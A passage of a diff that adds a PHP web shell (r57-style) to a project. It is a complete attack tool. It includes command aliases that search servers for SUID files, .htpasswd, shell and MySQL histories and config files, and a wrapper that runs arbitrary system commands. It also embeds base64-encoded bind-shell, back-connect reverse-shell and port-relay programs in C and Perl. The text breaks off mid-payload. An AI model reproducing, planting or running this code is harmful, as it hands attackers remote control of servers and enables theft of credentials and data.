+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+&#1040;&#1083;&#1080;&#1072;&#1089;&#1099; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;
+&#1055;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1090; &#1080;&#1079;&#1073;&#1077;&#1078;&#1072;&#1090;&#1100; &#1084;&#1085;&#1086;&#1075;&#1086;&#1082;&#1088;&#1072;&#1090;&#1085;&#1086;&#1075;&#1086; &#1085;&#1072;&#1073;&#1086;&#1088;&#1072; &#1086;&#1076;&#1085;&#1080;&#1093; &#1080; &#1090;&#1077;&#1093;-&#1078;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;. ( &#1057;&#1076;&#1077;&#1083;&#1072;&#1085;&#1086; &#1073;&#1083;&#1072;&#1075;&#1086;&#1076;&#1072;&#1088;&#1103; &#1084;&#1086;&#1077;&#1081; &#1087;&#1088;&#1080;&#1088;&#1086;&#1076;&#1085;&#1086;&#1081; &#1083;&#1077;&#1085;&#1080; )
+&#1042;&#1099; &#1084;&#1086;&#1078;&#1077;&#1090;&#1077; &#1089;&#1072;&#1084;&#1080; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1090;&#1100; &#1080;&#1083;&#1080; &#1080;&#1079;&#1084;&#1077;&#1085;&#1103;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>&#1080;</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1079;&#1072;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1087;&#1088;&#1086;&#1095;&#1080;&#1090;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "&#1053;&#1077; &#1091;&#1076;&#1072;&#1083;&#1086;&#1089;&#1100; &#1089;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100; "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
